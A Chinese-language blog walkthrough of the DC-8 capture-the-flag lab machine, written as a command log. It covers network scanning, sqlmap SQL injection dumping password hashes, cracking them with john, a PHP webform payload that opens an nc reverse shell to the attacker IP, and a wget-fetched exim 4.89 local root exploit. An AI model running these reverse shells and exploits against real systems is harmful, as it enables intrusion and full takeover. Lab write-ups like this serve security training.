【DC】DC-8
阿新 • • 發佈:2022-04-04
kali:192.168.223.131
target:192.168.223.161
首先確定目標IP為192.168.223.161
arp-scan -l
nmap掃描開放埠,發現開啟22(SSH)、80(HTTP)
//檢視是否存活
nmap -sP 192.168.223.161
//主動掃描
nmap -A -p- 192.168.223.161
訪問網站後,裡面只有幾個公告,懷疑有sql注入,新增單引號,發現報錯
丟到sqlmap裡面跑一下,獲得資料庫名為d7db
sqlmap -u http://192.168.223.161/?nid=2 --batch --dbs
跑表名,很多表中最有嫌疑的users表
sqlmap -u http://192.168.223.161/?nid=2 --batch -D d7db --tables
看一下欄目,有很多,name和pass應該是使用者名稱和密碼
sqlmap -u http://192.168.223.161/?nid=2 --batch -D d7db -T users --columns
dump一下資料,發現兩個使用者admin和john
sqlmap -u http://192.168.223.161/?nid=2 --batch -D d7db -T users -C name,pass --dump
將兩個使用者放到一個txt中用引號連線,用john去破解,獲得一個使用者名稱和密碼為john和turtle,admin怕是爆不出來了
//unamepass.txt
admin:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
//爆破
john unamepass.txt
根據之前drumal的經驗,找到登陸介面在/user/login,輸入後登陸後臺,在其中的content的find content的WEBFROM的From settings中找到可以寫php的地方
寫入程式碼並開啟監聽,並在contact us的View中提交,目標上線同時美化介面
<?php system("nc -e '/bin/sh' 192.168.223.131 1234");?>
nc -lvnp 1234
python -c "import pty;pty.spawn('/bin/bash')"
尋找有哪些命令可以以root許可權執行,發現有exim4,可能有漏洞
find / -perm -u=s -type f 2>/dev/null
看一下版本是4.89,查詢一下漏洞,有一個本地提權漏洞
/usr/sbin/exim4 --version
searchsploit exim
檢視該檔案,是一個直接執行的,需要對方下載執行
cp /usr/share/exploitdb/exploits/linux/local/46996.sh 46996.sh
cat 46996.sh
開啟HTTP服務,並讓對方下載
python -m SimpleHTTPServer 8000
cd /tmp
wget http://192.168.223.131:8000/46996.sh
nc -lvnp 31337
chmod +x 46996.sh
./46996.sh -m netcat
出現字元問題,對46996.sh進行編輯
:set ff=unix
//:set ff? 出現fileformat=unix表示成功
由於重新上傳,對新檔案改個名字為haha.sh,重新下載後執行,此時31337開啟
./haha.sh -m netcat
此時開啟nc監聽,連線上來的就是root許可權,拿到flag
nc -lvnp 9988
nc -e /bin/sh 192.168.223.131 9988
有時候漏洞無法使用可能因為字元出現問題,可以通過修改字元格式為unix進行調整